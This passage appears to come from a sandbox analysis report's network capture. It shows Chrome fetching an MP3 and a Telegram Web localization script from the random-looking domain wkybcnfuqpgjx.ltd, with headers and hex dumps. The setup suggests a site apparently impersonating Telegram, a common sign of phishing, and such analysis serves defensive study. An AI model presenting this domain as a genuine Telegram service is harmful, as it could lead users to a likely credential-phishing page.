                                  Data Ascii: s,n,a,i=!(arguments.length>2&&void 0!==arguments[2])||arguments[2];return function(){n=!0;for(var o=arguments.length,r=new Array(o),c=0;c<o;c++)r[c]=arguments[c];a=r,s||(i&&(n=!1,e(...a)),s=self.setInterval((()=>{if(!n)return self.clearInterval(s),void(s


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.649768172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC553OUTGET /notification.mp3 HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  Accept-Encoding: identity;q=1, *;q=0
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: audio
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Language: en-US,en;q=0.9
                                  Range: bytes=0-
                                  2025-01-12 00:03:44 UTC929INHTTP/1.1 206 Partial Content
                                  Date: Sun, 12 Jan 2025 00:03:44 GMT
                                  Content-Type: audio/mpeg
                                  Content-Length: 10880
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-2a80"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Content-Range: bytes 0-10879/10880
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0jlaAqsQFvJUOJRnzPvGWueAR7IdbXN7ZZKAKYOMp0hz5YCKVggmtdhiNYiycNQghehA%2F%2B3s6r4DgmCnXSLDWwDwn9ILt3LHXgCTGRyVfOg%2BFl6wa%2FlbCeYXtaYDAop0oW8goA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2984f734402-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1553&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1129&delivery_rate=1798029&cwnd=182&unsent_bytes=0&cid=a4e66b01f6f737a8&ts=637&x=0"
                                  2025-01-12 00:03:44 UTC440INData Raw: 49 44 33 03 00 00 00 00 02 38 54 41 4c 42 00 00 00 01 00 00 00 54 43 4f 4e 00 00 00 01 00 00 00 54 49 54 32 00 00 00 01 00 00 00 54 50 45 31 00 00 00 01 00 00 00 54 52 43 4b 00 00 00 01 00 00 00 54 59 45 52 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: ID38TALBTCONTIT2TPE1TRCKTYER
                                  2025-01-12 00:03:44 UTC1369INData Raw: ba bd c0 c0 c2 c5 c8 c8 ca cd d0 d2 d2 d5 d8 da da dd e0 e2 e5 e5 e8 ea ed ed f0 f2 f5 f8 f8 fa fd ff 00 00 00 32 4c 41 4d 45 33 2e 39 39 72 04 aa 00 00 00 00 2e 10 00 00 35 20 24 04 3c 4d 00 01 c2 00 00 28 be c7 83 d5 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: 2LAME3.99r.5 $<M(/
                                  2025-01-12 00:03:44 UTC1369INData Raw: 00 00 00 c3 a4 2c c9 40 4c 1f 0a 8e 11 09 4c 66 99 4c ff 0d cd 8a 2d 21 85 ea 52 de cb f0 13 92 13 ae a1 c8 cf f2 3b da f7 5c 3c 25 36 44 d0 6c bf ff ff ff 70 48 00 00 03 ed 24 40 00 00 70 ef 1f 7c 11 ed 9d 33 f4 b4 30 9b b4 f5 63 e3 56 14 06 e4 c3 4c 26 81 52 54 0b 18 14 ac 0e 87 97 96 27 2f 94 0c 35 71 ab 96 96 02 c2 cf 46 a1 69 94 58 c9 b4 c0 78 d5 20 00 10 27 86 7e 00 00 00 0a 12 ff fb 30 64 fd 81 72 53 1d 4f fb 5d a0 e8 06 40 09 a8 00 00 01 06 98 47 3d ec f1 63 20 0c 80 67 60 00 00 06 4c 46 41 08 48 93 98 92 37 18 71 12 19 56 1d 17 d5 be 02 00 2d 6c 5c 6a f1 65 54 4c 42 9a 19 ae 13 b3 b2 67 f2 c3 23 00 00 3e 82 62 00 00 0b 10 cf f8 01 f7 43 65 85 1d 00 8c 0e 48 4d 42 1b 0c 69 8f 0c ea 0e 8c 63 48 b3 03 14 c9 12 d6 e4 5c 08 0d 92 28 c9 59 7f 62 1d bb
                                  Data Ascii: ,@LLfL-!R;\<%6DlpH$@p|30cVL&RT'/5qFiXx '~0drSO]@G=c g`LFAH7qV-l\jeTLBg#>bCeHMBicH\(Yb
                                  2025-01-12 00:03:44 UTC1369INData Raw: 00 00 01 45 cc 49 3d ee 3c e6 e0 32 01 e7 f4 13 00 0c d1 47 a0 66 c8 10 c0 db 80 05 fe 84 a0 a5 05 87 b4 56 e1 19 b9 33 73 6e a2 0a a2 e0 74 7d cf a0 6f ed a0 c8 0a d8 89 67 40 2f 44 41 c2 9b 2a f1 43 00 31 49 79 0f c0 00 00 16 58 f1 96 88 55 00 03 a9 ac 84 46 22 93 19 8c 24 5a 17 28 bd b0 db 2e 90 da 09 49 36 96 54 11 fe d5 19 d2 98 70 05 60 00 00 03 80 00 00 e8 18 a0 94 30 35 a2 cb 7f ff e9 75 28 a0 06 29 2f ff fb 20 64 fd 81 71 78 11 d0 7b 98 29 b8 0b 80 1a 7e 04 00 01 45 68 49 3d ae 61 66 60 15 80 29 50 00 00 05 11 c6 01 91 93 0d 89 95 94 1c 09 38 70 10 c4 f4 23 36 04 0c 0e 05 41 f2 dc 38 4d 0a 72 dc 39 2f a4 45 5e 60 21 dc a9 b0 d3 8e fe 8a b0 58 07 02 01 16 87 8a 63 00 30 88 99 8e 00 00 00 16 f2 17 c9 11 d4 2c a4 72 c1 62 4d e5 72 42 c1 ea ae 81 50
                                  Data Ascii: EI=<2GfV3snt}og@/DA*C1IyXUF"$Z(.I6Tp`05u()/ dqx{)~EhI=af`)P8p#6A8Mr9/E^`!Xc0,rbMrBP
                                  2025-01-12 00:03:44 UTC1369INData Raw: 28 c9 75 06 be 0c 32 80 14 d4 03 49 6e 0c d6 30 3c ed 9d f7 0b 67 78 3d bc 21 60 00 00 00 00 00 b0 98 1f 27 43 51 e0 08 df a8 9c 00 99 25 af 65 29 96 20 a8 13 54 c3 f6 0c e8 08 42 c9 d8 92 29 8a f9 ae 03 70 be ce 8b c3 75 f5 06 ee 19 04 0c 3a 51 15 1c 6e a2 17 84 00 51 99 08 0e 00 00 ff fb 20 64 fe 01 51 5e 0d cf fb 63 03 28 0e e0 5a 9e 25 81 01 04 a4 49 3f ed 6c 44 e0 3f 81 e7 f4 93 04 0c 00 17 62 76 c3 4c c4 86 84 bf 16 58 a6 41 e3 b3 32 a1 a8 9f a7 a5 63 3b 7a 26 c0 6c 00 00 00 00 00 0d 85 cb 6d 54 06 5b 00 18 c3 03 70 96 14 1a e8 f3 89 30 da 70 13 69 68 95 b4 2a 93 84 25 55 14 f7 f7 10 5b c8 0d 86 a8 dd 9b ed 00 db df fe 00 00 00 0f c0 59 a8 82 e7 62 26 0e 14 78 ff fb 30 64 f5 03 71 40 08 50 79 fb c0 98 0d c0 6a 7e 24 62 01 04 9c 21 41 cc 6d e2 60 24
                                  Data Ascii: (u2In0<gx=!`'CQ%e) TB)pu:QnQ dQ^c(Z%I?lD?bvLXA2c;z&lmT[p0pih*%U[Yb&x0dq@Pyj~$b!Am`$
                                  2025-01-12 00:03:44 UTC1369INData Raw: ff fb 20 64 f8 01 70 e3 07 d6 71 ef 58 4a 0a e0 1a be 04 00 01 04 70 21 3f e7 e9 81 20 1e 80 6a 38 20 00 05 e7 bb 3d c2 17 9f e0 00 20 28 f2 72 2e 54 2b 0a a8 84 ed 56 26 89 e1 93 81 9a 99 06 00 6f 7a 9d ec 20 a9 e0 00 00 00 00 06 89 0a 2e 03 9c a8 12 ac c6 d1 37 53 8a 62 f0 59 cf 52 0e 00 00 00 00 00 01 86 b4 27 6c 43 20 39 0e 9b 3e 2a 15 44 a0 b4 3f 6f 4b d4 c1 47 d3 01 2d 47 45 ba 03 ff fb 10 64 fd 83 71 29 07 d0 79 f9 78 a8 0c 20 1a 8e 08 00 01 43 78 21 5b c7 bc 21 68 1c 81 69 f8 11 04 05 00 61 49 ae 2a db 20 bb d0 00 00 00 00 0b 90 54 a4 00 aa ac c3 47 24 0c 5c b2 8b b0 b4 ed 64 6c 6e e4 50 1c 80 00 00 00 00 01 c6 24 f4 5d c0 55 00 30 93 45 59 f5 b3 6d 42 45 94 8a 40 bd 2d 56 87 40 89 b9 ff fb 10 64 f5 03 70 f0 08 55 f1 ef 08 58 0a e0 0a be 00 00 01
                                  Data Ascii: dpqXJp!? j8 = (r.T+V&oz .7SbYR'lC 9>*D?oKG-GEdq)yx Cx![!hiaI* TG$\dlnP$]U0EYmBE@-V@dpUX
                                  2025-01-12 00:03:44 UTC1369INData Raw: 4c 41 4d 45 33 2e 39 39 2e 35 aa aa aa aa aa aa aa aa aa b9 30 ba 90 00 00 00 00 21 86 aa e8 ab 08 c2 d6 ff fb 10 64 fe 83 70 d6 07 51 f1 f8 78 38 0b 40 1a 6e 04 00 01 02 bc 1b 53 c7 bd 80 e8 15 00 68 f8 10 00 04 0e 16 70 20 0f c1 33 50 c4 d8 80 00 31 93 66 16 e0 8c d0 2c c4 e8 0e 69 d3 6c 1a 04 f0 2f 4b b1 15 4c 41 4d 45 33 2e 39 39 2e 35 55 55 bc 03 da c0 00 00 00 00 0d 9c 4e 08 58 48 70 4c 59 2e 5d a6 43 37 68 ff fb 10 64 fc 83 70 d3 07 d3 f3 0f 60 38 06 00 1a 24 04 00 01 03 04 1b 47 c8 e1 80 e8 15 80 68 b8 00 00 05 90 80 00 32 24 a6 c8 2e 5c 00 00 b0 35 14 60 1e 2a 98 d2 88 45 14 30 8d 53 ac 49 10 e8 01 00 9f 1e 4c 41 4d 45 33 2e 39 39 2e 35 aa aa aa 89 01 95 60 00 00 00 00 2b 0f a4 e8 28 04 1d 3c 90 c4 cc 0e 7a 99 ff fb 10 64 fa 07 70 d4 06 d2 f1 f8
                                  Data Ascii: LAME3.99.50!dpQx8@nShp 3P1f,il/KLAME3.99.5UUNXHpLY.]C7hdp`8$Gh2$.\5`*E0SILAME3.99.5`+(<zdp
                                  2025-01-12 00:03:44 UTC1369INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa 77 20 78 00 ff fb 10 64 f7 03 70 ab 06 d2 71 ef 08 48 04 e0 69 55 04 03 01 02 7c 1b 38 84 e1 60 e0 12 00 26 d0 00 00 04 00 00 00 00 0a 43 12 55 0a b2 81 2c a6 c0 ea 77 80 28 86 00 00 1c d4 6c 38 24 08 66 45 7b f6 41 b5 4c 41 4d 45 33 2e 39 39 2e 35 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 95 ff fb 10 64 f5 03 f0 97 06 ce a1 98 60 98 06 40 19 98 04 00 01 82 60 1b 45 c6 3c 22 e0 08 00 25 c0 00 00 06 0d 40 00 06 84 c8 26 f8 b5 97 32 b4 08 e4 b0 71 35 a8 6e 35 b4 c0 a7 57 09 19 aa 82 d8 3d 02 c7 aa 4c 41 4d 45 33 2e 39 39 2e 35 aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa 76 ff fb 10 64 f5 07 70 ad 06 cf 71 6f 60 a8 05 80 09 98 00 00 01 02 2c 19 3d c6 3d 82 68
                                  Data Ascii: w xdpqHiU|8`&CU,w(l8$fE{ALAME3.99.5UUUUUUUUUUUUUUUUUUUUUUUUd`@`E<"%@&2q5n5W=LAME3.99.5vdpqo`,==h
                                  2025-01-12 00:03:44 UTC857INData Raw: aa ff fb 10 64 eb 07 f0 78 06 4b 40 78 30 98 00 00 0f f0 00 00 01 01 68 19 36 80 c0 62 60 00 00 3f c0 00 00 04 aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa ff fb 10 64 ea 87 f0 6c 06 4d 20 38 30 98 00 00 0f f0 00 00 01 01 8c 19 32 80 c0 c2 a0 00 00 3f c0 00 00 04 aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa ff fb 10 64 ea 07 f0 69 04 cb 40 70 08 9a 00 00 0f f0 00 00 01 01 70 19 2b 00 e0 c2 60 00 00 3f c0 00 00 04 aa aa aa aa aa aa aa aa aa aa
                                  Data Ascii: dxK@x0h6b`?dlM 802?di@pp+`?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.649769172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC547OUTGET /5193.75042954cc9da1f6d6ac.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:44 UTC937INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:44 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-47f6"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6952
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWD%2BZBPXADeFzd8b3p%2BtRS9lclZodhkPQ8s3ErM%2FHXOHHkPXVcW%2B%2BI6QvXXVtpush%2Fcve7RsyliVGYKUjQFWkRZc3fI%2FSXKWMnkWU1sJgyxzNI%2F%2BpuA%2BFYn283v7VVqF1H0RSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2984eabefa9-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1763&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1125&delivery_rate=1570736&cwnd=163&unsent_bytes=0&cid=957c3ba8127b1d96&ts=148&x=0"
                                  2025-01-12 00:03:44 UTC432INData Raw: 34 37 66 36 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 39 33 5d 2c 7b 35 31 39 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 61 7d 29 3b 63 6f 6e 73 74 20 61 3d 7b 53 65 61 72 63 68 3a 22 53 65 61 72 63 68 22 2c 53 61 76 65 64 4d 65 73 73 61 67 65 73 3a 22 53 61 76 65 64 20 4d 65 73 73 61 67 65 73 22 2c 41 72 63 68 69 76 65 64 43 68 61 74 73 3a 22 41 72 63 68 69 76 65 64 20 43 68 61 74 73 22 2c 43 6f 6e 74 61 63 74 73 3a 22 43 6f 6e 74 61 63 74 73 22 2c 53 65 74 74 69 6e 67 73
                                  Data Ascii: 47f6"use strict";(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5193],{5193:(e,t,n)=>{n.r(t),n.d(t,{default:()=>a});const a={Search:"Search",SavedMessages:"Saved Messages",ArchivedChats:"Archived Chats",Contacts:"Contacts",Settings
                                  2025-01-12 00:03:44 UTC1369INData Raw: 63 72 4f 70 65 6e 4d 65 6e 75 32 3a 22 4f 70 65 6e 20 6d 65 6e 75 22 2c 4e 65 77 4d 65 73 73 61 67 65 54 69 74 6c 65 3a 22 4e 65 77 20 4d 65 73 73 61 67 65 22 2c 4e 65 77 43 68 61 6e 6e 65 6c 3a 22 4e 65 77 20 43 68 61 6e 6e 65 6c 22 2c 4e 65 77 47 72 6f 75 70 3a 22 4e 65 77 20 47 72 6f 75 70 22 2c 22 43 6f 6d 6d 6f 6e 2e 43 6c 6f 73 65 22 3a 22 43 6c 6f 73 65 22 2c 46 69 6c 74 65 72 41 6c 6c 43 68 61 74 73 3a 22 41 6c 6c 20 43 68 61 74 73 22 2c 4d 61 72 6b 41 73 55 6e 72 65 61 64 3a 22 4d 61 72 6b 20 61 73 20 75 6e 72 65 61 64 22 2c 55 6e 70 69 6e 46 72 6f 6d 54 6f 70 3a 22 55 6e 70 69 6e 20 66 72 6f 6d 20 74 6f 70 22 2c 22 43 68 61 74 4c 69 73 74 2e 4d 75 74 65 22 3a 22 4d 75 74 65 22 2c 41 72 63 68 69 76 65 3a 22 41 72 63 68 69 76 65 22 2c 44 65 6c 65
                                  Data Ascii: crOpenMenu2:"Open menu",NewMessageTitle:"New Message",NewChannel:"New Channel",NewGroup:"New Group","Common.Close":"Close",FilterAllChats:"All Chats",MarkAsUnread:"Mark as unread",UnpinFromTop:"Unpin from top","ChatList.Mute":"Mute",Archive:"Archive",Dele
                                  2025-01-12 00:03:44 UTC1369INData Raw: 62 65 72 22 3a 22 44 65 63 22 2c 53 65 61 72 63 68 41 6c 6c 43 68 61 74 73 53 68 6f 72 74 3a 22 43 68 61 74 73 22 2c 53 68 61 72 65 64 4d 65 64 69 61 54 61 62 32 3a 22 4d 65 64 69 61 22 2c 53 68 61 72 65 64 4c 69 6e 6b 73 54 61 62 32 3a 22 4c 69 6e 6b 73 22 2c 53 68 61 72 65 64 46 69 6c 65 73 54 61 62 32 3a 22 46 69 6c 65 73 22 2c 53 68 61 72 65 64 4d 75 73 69 63 54 61 62 32 3a 22 4d 75 73 69 63 22 2c 53 68 61 72 65 64 56 6f 69 63 65 54 61 62 32 3a 22 56 6f 69 63 65 22 2c 22 50 72 65 76 69 65 77 53 65 6e 64 65 72 2e 53 65 6e 64 50 68 6f 74 6f 22 3a 7b 6f 6e 65 56 61 6c 75 65 3a 22 53 65 6e 64 20 50 68 6f 74 6f 22 2c 6f 74 68 65 72 56 61 6c 75 65 3a 22 53 65 6e 64 20 25 64 20 50 68 6f 74 6f 73 22 7d 2c 53 65 6e 64 3a 22 53 65 6e 64 22 2c 22 50 72 65 76 69
                                  Data Ascii: ber":"Dec",SearchAllChatsShort:"Chats",SharedMediaTab2:"Media",SharedLinksTab2:"Links",SharedFilesTab2:"Files",SharedMusicTab2:"Music",SharedVoiceTab2:"Voice","PreviewSender.SendPhoto":{oneValue:"Send Photo",otherValue:"Send %d Photos"},Send:"Send","Previ
                                  2025-01-12 00:03:44 UTC1369INData Raw: 75 72 73 41 67 6f 22 3a 7b 6f 6e 65 56 61 6c 75 65 3a 22 6c 61 73 74 20 73 65 65 6e 20 31 20 68 6f 75 72 20 61 67 6f 22 2c 6f 74 68 65 72 56 61 6c 75 65 3a 22 6c 61 73 74 20 73 65 65 6e 20 25 40 20 68 6f 75 72 73 20 61 67 6f 22 7d 2c 46 6f 72 77 61 72 64 65 64 4d 65 73 73 61 67 65 3a 22 46 6f 72 77 61 72 64 65 64 20 6d 65 73 73 61 67 65 22 2c 22 57 65 65 6b 64 61 79 2e 59 65 73 74 65 72 64 61 79 22 3a 22 59 65 73 74 65 72 64 61 79 22 2c 41 74 74 61 63 68 56 69 64 65 6f 3a 22 56 69 64 65 6f 22 2c 4c 61 74 65 6c 79 3a 22 6c 61 73 74 20 73 65 65 6e 20 72 65 63 65 6e 74 6c 79 22 2c 22 57 65 65 6b 64 61 79 2e 54 75 65 73 64 61 79 22 3a 22 54 75 65 73 64 61 79 22 2c 22 57 65 65 6b 64 61 79 2e 57 65 64 6e 65 73 64 61 79 22 3a 22 57 65 64 6e 65 73 64 61 79 22 2c
                                  Data Ascii: ursAgo":{oneValue:"last seen 1 hour ago",otherValue:"last seen %@ hours ago"},ForwardedMessage:"Forwarded message","Weekday.Yesterday":"Yesterday",AttachVideo:"Video",Lately:"last seen recently","Weekday.Tuesday":"Tuesday","Weekday.Wednesday":"Wednesday",
                                  2025-01-12 00:03:44 UTC1369INData Raw: 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 75 70 6c 6f 61 64 5f 76 69 64 65 6f 3a 22 75 70 6c 6f 61 64 69 6e 67 20 76 69 64 65 6f 2e 2e 2e 22 2c 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 72 65 63 6f 72 64 5f 61 75 64 69 6f 3a 22 72 65 63 6f 72 64 69 6e 67 20 61 75 64 69 6f 2e 2e 2e 22 2c 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 75 70 6c 6f 61 64 5f 61 75 64 69 6f 3a 22 75 70 6c 6f 61 64 69 6e 67 20 61 75 64 69 6f 2e 2e 2e 22 2c 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 75 70 6c 6f 61 64 5f 70 68 6f 74 6f 3a 22 75 70 6c 6f 61 64 69 6e 67 20 70 68 6f 74 6f 2e 2e 2e 22 2c 6c 6e 67 5f 73 65 6e 64 5f 61 63 74 69 6f 6e 5f 75 70 6c 6f 61 64 5f 66 69 6c 65 3a 22 75 70 6c 6f 61 64 69 6e 67 20 66 69 6c 65 2e 2e 2e 22 2c 43 72 6f 70 49 6d 61
                                  Data Ascii: lng_send_action_upload_video:"uploading video...",lng_send_action_record_audio:"recording audio...",lng_send_action_upload_audio:"uploading audio...",lng_send_action_upload_photo:"uploading photo...",lng_send_action_upload_file:"uploading file...",CropIma
                                  2025-01-12 00:03:44 UTC1369INData Raw: 6f 6c 64 65 72 22 2c 4d 65 6d 62 65 72 73 3a 7b 6f 6e 65 56 61 6c 75 65 3a 22 25 31 24 64 20 6d 65 6d 62 65 72 22 2c 6f 74 68 65 72 56 61 6c 75 65 3a 22 25 31 24 64 20 6d 65 6d 62 65 72 73 22 7d 2c 47 65 6e 65 72 61 6c 3a 22 47 65 6e 65 72 61 6c 22 2c 6c 6e 67 5f 73 65 74 74 69 6e 67 73 5f 73 65 6e 64 5f 65 6e 74 65 72 3a 22 53 65 6e 64 20 77 69 74 68 20 45 6e 74 65 72 22 2c 6c 6e 67 5f 73 65 74 74 69 6e 67 73 5f 73 65 6e 64 5f 63 6d 64 65 6e 74 65 72 3a 22 53 65 6e 64 20 77 69 74 68 20 43 6d 64 2b 45 6e 74 65 72 22 2c 54 65 78 74 53 69 7a 65 3a 22 4d 65 73 73 61 67 65 20 54 65 78 74 20 53 69 7a 65 22 2c 43 68 61 74 42 61 63 6b 67 72 6f 75 6e 64 3a 22 43 68 61 74 20 42 61 63 6b 67 72 6f 75 6e 64 22 2c 22 56 6f 69 63 65 4f 76 65 72 2e 4b 65 79 62 6f 61 72
                                  Data Ascii: older",Members:{oneValue:"%1$d member",otherValue:"%1$d members"},General:"General",lng_settings_send_enter:"Send with Enter",lng_settings_send_cmdenter:"Send with Cmd+Enter",TextSize:"Message Text Size",ChatBackground:"Chat Background","VoiceOver.Keyboar
                                  2025-01-12 00:03:44 UTC1369INData Raw: 20 74 69 6d 65 3f 22 2c 50 72 69 76 61 63 79 50 72 6f 66 69 6c 65 50 68 6f 74 6f 54 69 74 6c 65 3a 22 57 68 6f 20 63 61 6e 20 73 65 65 20 6d 79 20 70 72 6f 66 69 6c 65 20 70 68 6f 74 6f 73 20 26 20 76 69 64 65 6f 73 3f 22 2c 50 72 69 76 61 63 79 46 6f 72 77 61 72 64 73 54 69 74 6c 65 3a 22 57 68 6f 20 63 61 6e 20 61 64 64 20 61 20 6c 69 6e 6b 20 74 6f 20 6d 79 20 61 63 63 6f 75 6e 74 20 77 68 65 6e 20 66 6f 72 77 61 72 64 69 6e 67 20 6d 79 20 6d 65 73 73 61 67 65 73 3f 22 2c 57 68 6f 43 61 6e 41 64 64 4d 65 3a 22 57 68 6f 20 63 61 6e 20 61 64 64 20 6d 65 20 74 6f 20 67 72 6f 75 70 20 63 68 61 74 73 3f 22 2c 6c 6e 67 5f 73 65 74 74 69 6e 67 73 5f 73 65 6e 73 69 74 69 76 65 5f 74 69 74 6c 65 3a 22 53 65 6e 73 69 74 69 76 65 20 63 6f 6e 74 65 6e 74 22 2c 6c
                                  Data Ascii: time?",PrivacyProfilePhotoTitle:"Who can see my profile photos & videos?",PrivacyForwardsTitle:"Who can add a link to my account when forwarding my messages?",WhoCanAddMe:"Who can add me to group chats?",lng_settings_sensitive_title:"Sensitive content",l
                                  2025-01-12 00:03:44 UTC1369INData Raw: 2e 2e 2e 22 2c 4e 65 76 65 72 53 68 61 72 65 57 69 74 68 54 69 74 6c 65 3a 22 4e 65 76 65 72 20 53 68 61 72 65 22 2c 22 50 72 69 76 61 63 79 2e 50 72 6f 66 69 6c 65 50 68 6f 74 6f 22 3a 22 50 72 6f 66 69 6c 65 20 50 68 6f 74 6f 22 2c 46 69 6c 74 65 72 4e 6f 43 68 61 74 73 54 6f 44 69 73 70 6c 61 79 3a 22 46 6f 6c 64 65 72 20 69 73 20 65 6d 70 74 79 22 2c 41 74 74 61 63 68 53 74 69 63 6b 65 72 3a 22 53 74 69 63 6b 65 72 22 2c 22 43 68 61 74 4c 69 73 74 2e 53 65 61 72 63 68 2e 53 68 6f 77 4d 6f 72 65 22 3a 22 53 68 6f 77 20 6d 6f 72 65 22 2c 22 44 69 61 6c 6f 67 4c 69 73 74 2e 53 65 61 72 63 68 53 65 63 74 69 6f 6e 44 69 61 6c 6f 67 73 22 3a 22 43 68 61 74 73 20 61 6e 64 20 43 6f 6e 74 61 63 74 73 22 2c 53 65 61 72 63 68 4d 65 73 73 61 67 65 73 3a 22 4d 65
                                  Data Ascii: ...",NeverShareWithTitle:"Never Share","Privacy.ProfilePhoto":"Profile Photo",FilterNoChatsToDisplay:"Folder is empty",AttachSticker:"Sticker","ChatList.Search.ShowMore":"Show more","DialogList.SearchSectionDialogs":"Chats and Contacts",SearchMessages:"Me
